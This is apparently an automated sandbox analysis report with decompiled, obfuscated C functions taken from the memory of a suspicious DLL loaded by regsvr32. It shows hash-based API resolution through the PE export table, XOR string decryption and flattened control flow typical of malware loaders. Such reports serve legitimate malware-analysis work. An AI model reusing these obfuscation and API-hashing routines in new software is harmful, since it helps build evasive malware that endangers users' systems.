                                                                                                                • Opcode Fuzzy Hash: 4f93a5e54878230d43692652f527e9b756212f7c7ea296bddbd07015ad04af84
                                                                                                                • Instruction Fuzzy Hash: A151897250C3009FC758DE21D88986FBBE4FBC4B58F504A1DF59AA2250DB748A49CF87
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 98%
                                                                                                                			E001C1FC7() {
                                                                                                                				signed int _v4;
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				unsigned int _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				intOrPtr _t140;
                                                                                                                				intOrPtr _t141;
                                                                                                                				signed int _t150;
                                                                                                                				signed int _t151;
                                                                                                                				signed int _t152;
                                                                                                                				intOrPtr _t153;
                                                                                                                				void* _t164;
                                                                                                                				signed int* _t166;
                                                                                                                
                                                                                                                				_t166 =  &_v48;
                                                                                                                				_v36 = 0x8b97ff;
                                                                                                                				_v36 = _v36 * 0x59;
                                                                                                                				_v36 = _v36 + 0xaa6c;
                                                                                                                				_t164 = 0x9199d36;
                                                                                                                				_v36 = _v36 >> 0xb;
                                                                                                                				_v36 = _v36 ^ 0x00088996;
                                                                                                                				_v40 = 0xff5bde;
                                                                                                                				_v40 = _v40 ^ 0xd92fa0aa;
                                                                                                                				_v40 = _v40 << 4;
                                                                                                                				_v40 = _v40 | 0x2f09fff6;
                                                                                                                				_v40 = _v40 ^ 0xbf080e99;
                                                                                                                				_v44 = 0xd70909;
                                                                                                                				_v44 = _v44 | 0xfb9b1292;
                                                                                                                				_t150 = 0x75;
                                                                                                                				_v44 = _v44 / _t150;
                                                                                                                				_v44 = _v44 ^ 0xd39b4d7c;
                                                                                                                				_v44 = _v44 ^ 0xd1bce07f;
                                                                                                                				_v48 = 0x8e4fda;
                                                                                                                				_v48 = _v48 ^ 0x3e696583;
                                                                                                                				_v48 = _v48 ^ 0x211b6c22;
                                                                                                                				_v48 = _v48 ^ 0xc52a23e8;
                                                                                                                				_v48 = _v48 ^ 0xdadac422;
                                                                                                                				_v32 = 0x7c4ada;
                                                                                                                				_t151 = 0x19;
                                                                                                                				_v32 = _v32 * 0x7c;
                                                                                                                				_v32 = _v32 * 0x78;
                                                                                                                				_v32 = _v32 >> 9;
                                                                                                                				_v32 = _v32 ^ 0x001d18fe;
                                                                                                                				_v8 = 0x5faf65;
                                                                                                                				_v8 = _v8 / _t151;
                                                                                                                				_v8 = _v8 + 0xffff8fe8;
                                                                                                                				_v8 = _v8 ^ 0x0009af76;
                                                                                                                				_v12 = 0xa61902;
                                                                                                                				_v12 = _v12 >> 8;
                                                                                                                				_v12 = _v12 ^ 0x0bb8dc11;
                                                                                                                				_v12 = _v12 ^ 0x0bb92fa9;
                                                                                                                				_v16 = 0xf70b1;
                                                                                                                				_v16 = _v16 ^ 0xe87f1af0;
                                                                                                                				_v16 = _v16 ^ 0x08a3af38;
                                                                                                                				_v16 = _v16 ^ 0xe0d4a70f;
                                                                                                                				_v20 = 0x67b244;
                                                                                                                				_t152 = 0x64;
                                                                                                                				_v20 = _v20 * 0x22;
                                                                                                                				_v20 = _v20 * 0x3a;
                                                                                                                				_v20 = _v20 >> 2;
                                                                                                                				_v20 = _v20 ^ 0x07ba9e2f;
                                                                                                                				_v4 = 0xe6758f;
                                                                                                                				_v4 = _v4 / _t152;
                                                                                                                				_v4 = _v4 ^ 0x30130e30;
                                                                                                                				_v4 = _v4 ^ 0x301f0688;
                                                                                                                				_v24 = 0xf6df44;
                                                                                                                				_v24 = _v24 + 0xffffe436;
                                                                                                                				_v24 = _v24 | 0xd32bb81d;
                                                                                                                				_v24 = _v24 ^ 0x64308b38;
                                                                                                                				_v24 = _v24 ^ 0xb7c00501;
                                                                                                                				_v28 = 0x186c2;
                                                                                                                				_v28 = _v28 | 0x95c154b2;
                                                                                                                				_v28 = _v28 + 0x54a5;
                                                                                                                				_v28 = _v28 >> 0xd;
                                                                                                                				_v28 = _v28 ^ 0x00011a2c;
                                                                                                                				_t153 =  *0x1c4c14; // 0x0
                                                                                                                				do {
                                                                                                                					while(_t164 != 0x4234483) {
                                                                                                                						if(_t164 == 0x56da234) {
                                                                                                                							_t141 = E001B0231(0, _v20, _t153, E001A4313, _t153, _t153, _v4, _v24, _v28);
                                                                                                                							_t153 =  *0x1c4c14; // 0x0
                                                                                                                							 *((intOrPtr*)(_t153 + 0x14)) = _t141;
                                                                                                                						} else {
                                                                                                                							if(_t164 != 0x9199d36) {
                                                                                                                								goto L6;
                                                                                                                							} else {
                                                                                                                								_push(_t153);
                                                                                                                								_t153 = E001A303A(_t153, 0x20);
                                                                                                                								_t166 =  &(_t166[3]);
                                                                                                                								 *0x1c4c14 = _t153;
                                                                                                                								_t164 = 0x4234483;
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L9:
                                                                                                                						return 0 | _t153 != 0x00000000;
                                                                                                                					}
                                                                                                                					_t140 = E001B6D6B(_v32, _v8, _t153, _v12, _v16);
                                                                                                                					_t153 =  *0x1c4c14; // 0x0
                                                                                                                					_t166 = _t166 - 0xc + 0x18;
                                                                                                                					_t164 = 0x56da234;
                                                                                                                					 *((intOrPtr*)(_t153 + 0x1c)) = _t140;
                                                                                                                					L6:
                                                                                                                				} while (_t164 != 0x4e3b051);
                                                                                                                				goto L9;
                                                                                                                 			}

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • Opcode ID: 432b5c2f1e95a71141ceb2981ca61d5b419db6a838e1d71f849ad2df2637ab98
                                                                                                                • Instruction ID: 9117714ed822af3e7c0f52807d558d552abc2571c631e42b78d3c173a1864789
                                                                                                                • Opcode Fuzzy Hash: 432b5c2f1e95a71141ceb2981ca61d5b419db6a838e1d71f849ad2df2637ab98
                                                                                                                • Instruction Fuzzy Hash: A26163715093019FC348CF25D68A80BBFF1EBD8758F50991DF496A6260D3B4DA498F87
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 91%
                                                                                                                			E001B7B9E(void* __ecx, void* __edx, void* __eflags, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				unsigned int _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				signed int _v52;
                                                                                                                				char _v56;
                                                                                                                				intOrPtr _v60;
                                                                                                                				intOrPtr _v64;
                                                                                                                				intOrPtr _v68;
                                                                                                                				intOrPtr _v72;
                                                                                                                				void* _t154;
                                                                                                                				signed int _t176;
                                                                                                                				signed int _t177;
                                                                                                                				signed int _t178;
                                                                                                                				signed int _t179;
                                                                                                                				signed int _t180;
                                                                                                                				signed int _t181;
                                                                                                                				intOrPtr _t183;
                                                                                                                
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_v56 = 0x104;
                                                                                                                				_push(_a8);
                                                                                                                				_push(0x104);
                                                                                                                				_push(__ecx);
                                                                                                                				E001AC98A(0x104);
                                                                                                                				_v72 = 0xe3f37e;
                                                                                                                				_t183 = 0;
                                                                                                                				_v68 = 0xa938b2;
                                                                                                                				_v64 = 0;
                                                                                                                				_v60 = 0;
                                                                                                                				_v40 = 0x91ec8f;
                                                                                                                				_v40 = _v40 | 0x9bbb7b7b;
                                                                                                                				_v40 = _v40 ^ 0x9bbbefff;
                                                                                                                				_v36 = 0xfe4da3;
                                                                                                                				_t176 = 0x3f;
                                                                                                                				_v36 = _v36 / _t176;
                                                                                                                				_v36 = _v36 >> 0xf;
                                                                                                                				_v36 = _v36 ^ 0x000b3cc6;
                                                                                                                				_v8 = 0xbe4c96;
                                                                                                                				_v8 = _v8 | 0xa20a000d;
                                                                                                                				_v8 = _v8 ^ 0x89f75b2f;
                                                                                                                				_v8 = _v8 ^ 0xb104f72e;
                                                                                                                				_v8 = _v8 ^ 0x9a4d5751;
                                                                                                                				_v44 = 0x7127fb;
                                                                                                                				_v44 = _v44 | 0xac3ebebd;
                                                                                                                				_v44 = _v44 ^ 0xac7252fb;
                                                                                                                				_v32 = 0x9ec20e;
                                                                                                                				_v32 = _v32 ^ 0x6a603fa2;
                                                                                                                				_t177 = 0x4c;
                                                                                                                				_v32 = _v32 / _t177;
                                                                                                                				_v32 = _v32 ^ 0x016d12d1;
                                                                                                                				_v20 = 0xc46992;
                                                                                                                				_v20 = _v20 + 0xbf38;
                                                                                                                				_t178 = 0x1d;
                                                                                                                				_v20 = _v20 / _t178;
                                                                                                                				_v20 = _v20 + 0xae20;
                                                                                                                				_v20 = _v20 ^ 0x000bb178;
                                                                                                                				_v48 = 0x634add;
                                                                                                                				_v48 = _v48 | 0x23fb58f3;
                                                                                                                				_v48 = _v48 ^ 0x23ffa6a1;
                                                                                                                				_v16 = 0x1d1a05;
                                                                                                                				_t179 = 0x49;
                                                                                                                				_v16 = _v16 / _t179;
                                                                                                                				_v16 = _v16 | 0x52a10316;
                                                                                                                				_t180 = 0x3e;
                                                                                                                				_v16 = _v16 / _t180;
                                                                                                                				_v16 = _v16 ^ 0x015f80ea;
                                                                                                                				_v12 = 0xce9650;
                                                                                                                				_v12 = _v12 >> 0x10;
                                                                                                                				_v12 = _v12 | 0xc4d79ca6;
                                                                                                                				_v12 = _v12 * 0x74;
                                                                                                                				_v12 = _v12 ^ 0x31b19315;
                                                                                                                				_v28 = 0x74c1da;
                                                                                                                				_v28 = _v28 << 3;
                                                                                                                				_v28 = _v28 << 4;
                                                                                                                				_v28 = _v28 + 0xffffd949;
                                                                                                                				_v28 = _v28 ^ 0x3a61849f;
                                                                                                                				_v52 = 0xb6054c;
                                                                                                                				_t181 = 0x7f;
                                                                                                                				_v52 = _v52 / _t181;
                                                                                                                				_v52 = _v52 ^ 0x000700c1;
                                                                                                                				_v24 = 0x1ec994;
                                                                                                                				_v24 = _v24 >> 1;
                                                                                                                				_v24 = _v24 + 0xffff90be;
                                                                                                                				_v24 = _v24 + 0xffffc472;
                                                                                                                				_v24 = _v24 ^ 0x0003971a;
                                                                                                                				_t154 = E001ABD6B(__ecx, __ecx, __ecx, __ecx, _v40);
                                                                                                                				_t182 = _t154;
                                                                                                                				if(_t154 != 0) {
                                                                                                                					_t183 = E001BF73B(_v20, _v48, _v16, _v12, _a12, _t182,  &_v56);
                                                                                                                					E001B02D8(_t182, _v28, _v52, _v24);
                                                                                                                				}
                                                                                                                				return _t183;
                                                                                                                			}





























                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 2962429428-0
                                                                                                                • Opcode ID: ea0b58b7ce2fc6767d65ef364a369dc025e088d061202e099b0601af30ddc4b7
                                                                                                                • Instruction ID: 8105daae8c34495ab8c0fd1de5c26cc9beb1a4af69f5a9a6964148a80e06099e
                                                                                                                • Opcode Fuzzy Hash: ea0b58b7ce2fc6767d65ef364a369dc025e088d061202e099b0601af30ddc4b7
                                                                                                                • Instruction Fuzzy Hash: 345114B1D00219EBDF14CFE6C9868EEBBB2FF88314F208159E511B6260C7B54A51CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 93%
                                                                                                                			E001BA683(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				char _v60;
                                                                                                                				intOrPtr _v64;
                                                                                                                				intOrPtr _v68;
                                                                                                                				intOrPtr _v72;
                                                                                                                				intOrPtr _v76;
                                                                                                                				signed int _v80;
                                                                                                                				signed int _v84;
                                                                                                                				signed int _v88;
                                                                                                                				signed int _v92;
                                                                                                                				signed int _v96;
                                                                                                                				signed int _v100;
                                                                                                                				signed int _v104;
                                                                                                                				signed int _v108;
                                                                                                                				void* _t87;
                                                                                                                				void* _t100;
                                                                                                                				void* _t102;
                                                                                                                				void* _t104;
                                                                                                                				intOrPtr _t123;
                                                                                                                				signed int _t124;
                                                                                                                				signed int _t125;
                                                                                                                				signed int _t126;
                                                                                                                				signed int* _t129;
                                                                                                                
                                                                                                                				_t122 = _a8;
                                                                                                                				_t102 = __edx;
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E001AC98A(_t87);
                                                                                                                				_v76 = 0x39afd1;
                                                                                                                				_t129 =  &(( &_v108)[4]);
                                                                                                                				_v72 = 0xfa1290;
                                                                                                                				_t123 = 0;
                                                                                                                				_v68 = 0;
                                                                                                                				_v64 = 0;
                                                                                                                				_t104 = 0x963a914;
                                                                                                                				_v104 = 0xdbf44d;
                                                                                                                				_v104 = _v104 ^ 0x1bb24012;
                                                                                                                				_v104 = _v104 + 0xffff5b62;
                                                                                                                				_t124 = 0x52;
                                                                                                                				_v104 = _v104 / _t124;
                                                                                                                				_v104 = _v104 ^ 0x005b0c8e;
                                                                                                                				_v92 = 0x2ce29a;
                                                                                                                				_v92 = _v92 >> 5;
                                                                                                                				_v92 = _v92 + 0xffffcf98;
                                                                                                                				_v92 = _v92 ^ 0x00061092;
                                                                                                                				_v108 = 0xe963c0;
                                                                                                                				_v108 = _v108 | 0xb7c43538;
                                                                                                                				_t125 = 0x7d;
                                                                                                                				_v108 = _v108 * 0x1c;
                                                                                                                				_v108 = _v108 + 0x8e32;
                                                                                                                				_v108 = _v108 ^ 0x1df924c0;
                                                                                                                				_v84 = 0x486686;
                                                                                                                				_v84 = _v84 << 3;
                                                                                                                				_v84 = _v84 ^ 0x024e1d30;
                                                                                                                				_v96 = 0xfe9955;
                                                                                                                				_v96 = _v96 / _t125;
                                                                                                                				_v96 = _v96 ^ 0x7014b57f;
                                                                                                                				_v96 = _v96 ^ 0x701f7fe5;
                                                                                                                				_v88 = 0x4f8fd6;
                                                                                                                				_v88 = _v88 >> 9;
                                                                                                                				_v88 = _v88 ^ 0x00053295;
                                                                                                                				_v80 = 0x6476a3;
                                                                                                                				_v80 = _v80 + 0x2789;
                                                                                                                				_v80 = _v80 ^ 0x00671fa4;
                                                                                                                				_v100 = 0x1b01a5;
                                                                                                                				_t126 = 0x4c;
                                                                                                                				_v100 = _v100 * 0x75;
                                                                                                                				_v100 = _v100 >> 0xd;
                                                                                                                				_v100 = _v100 / _t126;
                                                                                                                				_v100 = _v100 ^ 0x0006fca2;
                                                                                                                				do {
                                                                                                                					while(_t104 != 0xe8dbcd) {
                                                                                                                						if(_t104 == 0x1773ec0) {
                                                                                                                							E001A6DD9( &_v60, _v104, _v92, _t102, _v108);
                                                                                                                							_t129 =  &(_t129[3]);
                                                                                                                							_t104 = 0x3bcb7b8;
                                                                                                                							continue;
                                                                                                                						} else {
                                                                                                                							if(_t104 == 0x3bcb7b8) {
                                                                                                                								_t100 = E001B6D3A( &_v60, _t122, _v84, _v96, _v88);
                                                                                                                								_t129 =  &(_t129[3]);
                                                                                                                								__eflags = _t100;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									_t104 = 0xe8dbcd;
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								if(_t104 != 0x963a914) {
                                                                                                                									goto L10;
                                                                                                                								} else {
                                                                                                                									_t104 = 0x1773ec0;
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						goto L11;
                                                                                                                					}
                                                                                                                					__eflags = E001AA903(_v80, _t122 + 4, __eflags, _v100,  &_v60);
                                                                                                                					_t123 =  !=  ? 1 : _t123;
                                                                                                                					_t104 = 0xf5a1145;
                                                                                                                					L10:
                                                                                                                					__eflags = _t104 - 0xf5a1145;
                                                                                                                				} while (__eflags != 0);
                                                                                                                				L11:
                                                                                                                				return _t123;
                                                                                                                			}

























                                                                                                                0x001ba80e
                                                                                                                0x001ba811
                                                                                                                0x001ba813
                                                                                                                0x001ba815
                                                                                                                0x00000000
                                                                                                                0x001ba815
                                                                                                                0x001ba7e8
                                                                                                                0x001ba7ee
                                                                                                                0x00000000
                                                                                                                0x001ba7f0
                                                                                                                0x001ba7f0
                                                                                                                0x00000000
                                                                                                                0x001ba7f0
                                                                                                                0x001ba7ee
                                                                                                                0x001ba7e6
                                                                                                                0x00000000
                                                                                                                0x001ba7de
                                                                                                                0x001ba853
                                                                                                                0x001ba855
                                                                                                                0x001ba858
                                                                                                                0x001ba85d
                                                                                                                0x001ba85d
                                                                                                                0x001ba85d
                                                                                                                0x001ba86a
                                                                                                                0x001ba872

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 085fa649f1bf50db60e967f6246070b1a1cc04d7c49565a1decda229ba8295b7
                                                                                                                • Instruction ID: c64113a8a3b8fe4b781bd127ac7f722745c3bacefd5c06dacb724595555a6aef
                                                                                                                • Opcode Fuzzy Hash: 085fa649f1bf50db60e967f6246070b1a1cc04d7c49565a1decda229ba8295b7
                                                                                                                • Instruction Fuzzy Hash: A75187721083418BC718CF25D98542FFBE2FFD8748F50491EF5C9A6660C7768A088B97
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 86%
                                                                                                                			E001B66C8(intOrPtr __ecx, void* __edx) {
                                                                                                                				intOrPtr _t96;
                                                                                                                				signed int _t101;
                                                                                                                				void* _t111;
                                                                                                                				signed int _t113;
                                                                                                                				signed int _t114;
                                                                                                                				signed int _t115;
                                                                                                                				signed int _t129;
                                                                                                                				intOrPtr* _t130;
                                                                                                                				intOrPtr _t133;
                                                                                                                				void* _t134;
                                                                                                                				void* _t135;
                                                                                                                
                                                                                                                				_t133 =  *((intOrPtr*)(_t134 + 0x38));
                                                                                                                				_push( *((intOrPtr*)(_t134 + 0x44)));
                                                                                                                				 *((intOrPtr*)(_t134 + 0x24)) = __ecx;
                                                                                                                				_push(_t133);
                                                                                                                				_push( *((intOrPtr*)(_t134 + 0x44)));
                                                                                                                				_push( *((intOrPtr*)(_t134 + 0x44)));
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E001AC98A(__ecx);
                                                                                                                				 *((intOrPtr*)(_t134 + 0x30)) = 0xc609f6;
                                                                                                                				_t135 = _t134 + 0x18;
                                                                                                                				 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 5;
                                                                                                                				_t130 = 0;
                                                                                                                				_t113 = 0x3e;
                                                                                                                				 *(_t135 + 0x1c) =  *(_t135 + 0x18) * 0x4a;
                                                                                                                				 *(_t135 + 0x1c) =  *(_t135 + 0x1c) ^ 0x01c9f6d6;
                                                                                                                				 *(_t135 + 0x18) = 0x4bc33;
                                                                                                                				 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 0xa;
                                                                                                                				 *(_t135 + 0x18) =  *(_t135 + 0x18) + 0x1b9f;
                                                                                                                				 *(_t135 + 0x18) =  *(_t135 + 0x18) * 0xc;
                                                                                                                				 *(_t135 + 0x18) =  *(_t135 + 0x18) ^ 0x000e0e4a;
                                                                                                                				 *(_t135 + 0x20) = 0x61f1eb;
                                                                                                                				 *(_t135 + 0x20) =  *(_t135 + 0x20) << 3;
                                                                                                                				 *(_t135 + 0x20) =  *(_t135 + 0x20) ^ 0x03096057;
                                                                                                                				 *(_t135 + 0x14) = 0x75399;
                                                                                                                				 *(_t135 + 0x14) =  *(_t135 + 0x14) / _t113;
                                                                                                                				_t114 = 0x2b;
                                                                                                                				 *(_t135 + 0x14) =  *(_t135 + 0x14) / _t114;
                                                                                                                				 *(_t135 + 0x14) =  *(_t135 + 0x14) + 0xfffff167;
                                                                                                                				 *(_t135 + 0x14) =  *(_t135 + 0x14) ^ 0xfff2e3f6;
                                                                                                                				 *(_t135 + 0x44) = 0x84ac1f;
                                                                                                                				_t115 = 0x13;
                                                                                                                				 *(_t135 + 0x40) =  *(_t135 + 0x44) / _t115;
                                                                                                                				 *(_t135 + 0x40) =  *(_t135 + 0x40) << 0xc;
                                                                                                                				 *(_t135 + 0x40) =  *(_t135 + 0x40) + 0xffff5e1a;
                                                                                                                				 *(_t135 + 0x40) =  *(_t135 + 0x40) ^ 0x6fbb0edc;
                                                                                                                				_t96 =  *((intOrPtr*)(_t133 + 0x3c));
                                                                                                                				_t129 =  *(_t135 + 0x18);
                                                                                                                				 *((intOrPtr*)(_t135 + 0x30)) = _t96;
                                                                                                                				_t111 =  *((intOrPtr*)(_t96 + _t133 + 0x78)) + _t133;
                                                                                                                				 *((intOrPtr*)(_t135 + 0x2c)) =  *((intOrPtr*)(_t111 + 0x1c)) + _t133;
                                                                                                                				_t117 =  *((intOrPtr*)(_t111 + 0x20)) + _t133;
                                                                                                                				 *((intOrPtr*)(_t135 + 0x24)) =  *((intOrPtr*)(_t111 + 0x20)) + _t133;
                                                                                                                				 *((intOrPtr*)(_t135 + 0x28)) =  *((intOrPtr*)(_t111 + 0x24)) + _t133;
                                                                                                                				while(_t129 <  *((intOrPtr*)(_t111 + 0x18))) {
                                                                                                                					_t101 = E001B2FAB( *(_t135 + 0x20),  *((intOrPtr*)(_t117 + _t129 * 4)) + _t133,  *((intOrPtr*)(_t135 + 0x24)),  *(_t135 + 0x14),  *(_t135 + 0x40));
                                                                                                                					_t135 = _t135 + 0xc;
                                                                                                                					if((_t101 ^ 0x1e6ea728) ==  *(_t135 + 0x20)) {
                                                                                                                						_t130 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 0x2c)) + ( *( *((intOrPtr*)(_t135 + 0x28)) + _t129 * 2) & 0x0000ffff) * 4)) + _t133;
                                                                                                                						if(_t130 >= _t111 && _t130 <  *((intOrPtr*)( *((intOrPtr*)(_t135 + 0x30)) + _t133 + 0x7c)) + _t111) {
                                                                                                                							_t130 = E001ABB14(_t130);
                                                                                                                						}
                                                                                                                						L8:
                                                                                                                						return _t130;
                                                                                                                					}
                                                                                                                					_t117 =  *((intOrPtr*)(_t135 + 0x24));
                                                                                                                					_t129 = _t129 + 1;
                                                                                                                				}
                                                                                                                				goto L8;
                                                                                                                			}















                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 08be4f400afe8638c854dd42a0da104b59195b135d46cfbe8a384d3e629d9a2e
                                                                                                                • Instruction ID: 67a1b1c60375b368ef39bbe453e42d797ed7216ca40fe48d7b8691d353876789
                                                                                                                • Opcode Fuzzy Hash: 08be4f400afe8638c854dd42a0da104b59195b135d46cfbe8a384d3e629d9a2e
                                                                                                                • Instruction Fuzzy Hash: 774168B1A083018FC714CF25C88581BBBF1FBD8748F000A2DF985A7221D775EA49CB86
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 89%
                                                                                                                			E001AE4F5(void* __ecx, signed int* __edx, void* __eflags) {
                                                                                                                				void* _t60;
                                                                                                                				signed int _t67;
                                                                                                                				unsigned int* _t81;
                                                                                                                				signed int _t82;
                                                                                                                				signed int _t84;
                                                                                                                				signed int _t85;
                                                                                                                				signed int _t89;
                                                                                                                				unsigned int _t90;
                                                                                                                				unsigned int _t91;
                                                                                                                				unsigned int* _t96;
                                                                                                                				signed int* _t98;
                                                                                                                				signed int* _t99;
                                                                                                                				unsigned int _t102;
                                                                                                                				void* _t108;
                                                                                                                				void* _t110;
                                                                                                                				void* _t112;
                                                                                                                				void* _t114;
                                                                                                                
                                                                                                                				_push( *((intOrPtr*)(_t112 + 0x38)));
                                                                                                                				_t100 = __edx;
                                                                                                                				_push(__edx);
                                                                                                                				E001AC98A(_t60);
                                                                                                                				 *((intOrPtr*)(_t112 + 0x30)) = 0xc85959;
                                                                                                                				asm("stosd");
                                                                                                                				_t84 = 0x7f;
                                                                                                                				asm("stosd");
                                                                                                                				asm("stosd");
                                                                                                                				 *(_t112 + 0x20) = 0xd79550;
                                                                                                                				_t5 = _t100 + 4; // 0x1a17e4
                                                                                                                				_t98 = _t5;
                                                                                                                				 *(_t112 + 0x20) =  *(_t112 + 0x20) ^ 0xc496e2fd;
                                                                                                                				 *(_t112 + 0x20) =  *(_t112 + 0x20) + 0x8818;
                                                                                                                				 *(_t112 + 0x20) =  *(_t112 + 0x20) ^ 0xc44d0682;
                                                                                                                				 *(_t112 + 0x1c) = 0x5b7d90;
                                                                                                                				 *(_t112 + 0x1c) =  *(_t112 + 0x1c) | 0xcdfe43db;
                                                                                                                				 *(_t112 + 0x1c) =  *(_t112 + 0x1c) ^ 0xd8c82edf;
                                                                                                                				 *(_t112 + 0x1c) =  *(_t112 + 0x1c) / _t84;
                                                                                                                				 *(_t112 + 0x1c) =  *(_t112 + 0x1c) ^ 0x00204617;
                                                                                                                				 *(_t112 + 0x24) = 0x7cc493;
                                                                                                                				 *(_t112 + 0x24) =  *(_t112 + 0x24) + 0x9e62;
                                                                                                                				 *(_t112 + 0x24) =  *(_t112 + 0x24) ^ 0x007fda5d;
                                                                                                                				 *(_t112 + 0x18) = 0xa2e5de;
                                                                                                                				 *(_t112 + 0x18) =  *(_t112 + 0x18) >> 7;
                                                                                                                				 *(_t112 + 0x18) =  *(_t112 + 0x18) + 0xfffff1ac;
                                                                                                                				 *(_t112 + 0x18) =  *(_t112 + 0x18) ^ 0x490c9894;
                                                                                                                				 *(_t112 + 0x18) =  *(_t112 + 0x18) ^ 0x4904b1a0;
                                                                                                                				_t85 =  *__edx;
                                                                                                                				_t99 =  &(_t98[1]);
                                                                                                                				_t67 =  *_t98 ^ _t85;
                                                                                                                				 *(_t112 + 0x28) = _t85;
                                                                                                                				 *(_t112 + 0x2c) = _t67;
                                                                                                                				_t43 = _t67 + 1; // 0xd8c82ee0
                                                                                                                				_t101 = _t43;
                                                                                                                				_t102 =  !=  ? (_t43 & 0xfffffffc) + 4 : _t43;
                                                                                                                				_t81 = E001A303A(_t101 & 0x00000003, _t102);
                                                                                                                				_t114 = _t112 + 0x14;
                                                                                                                				 *(_t114 + 0x18) = _t81;
                                                                                                                				if(_t81 != 0) {
                                                                                                                					_t110 = 0;
                                                                                                                					_t96 = _t81;
                                                                                                                					_t108 =  >  ? 0 :  &(_t99[_t102 >> 2]) - _t99 + 3 >> 2;
                                                                                                                					if(_t108 != 0) {
                                                                                                                						_t82 =  *(_t114 + 0x20);
                                                                                                                						do {
                                                                                                                							_t89 =  *_t99;
                                                                                                                							_t52 =  &(_t99[1]); // 0x2269bcbe
                                                                                                                							_t99 = _t52;
                                                                                                                							_t90 = _t89 ^ _t82;
                                                                                                                							 *_t96 = _t90;
                                                                                                                							_t96 =  &(_t96[1]);
                                                                                                                							_t91 = _t90 >> 0x10;
                                                                                                                							 *((char*)(_t96 - 3)) = _t90 >> 8;
                                                                                                                							 *(_t96 - 2) = _t91;
                                                                                                                							_t110 = _t110 + 1;
                                                                                                                							 *((char*)(_t96 - 1)) = _t91 >> 8;
                                                                                                                						} while (_t110 < _t108);
                                                                                                                						_t81 =  *(_t114 + 0x1c);
                                                                                                                					}
                                                                                                                					 *((char*)(_t81 +  *((intOrPtr*)(_t114 + 0x24)))) = 0;
                                                                                                                				}
                                                                                                                				return _t81;
                                                                                                                			}





















                                                                                                                Memory Dump Source
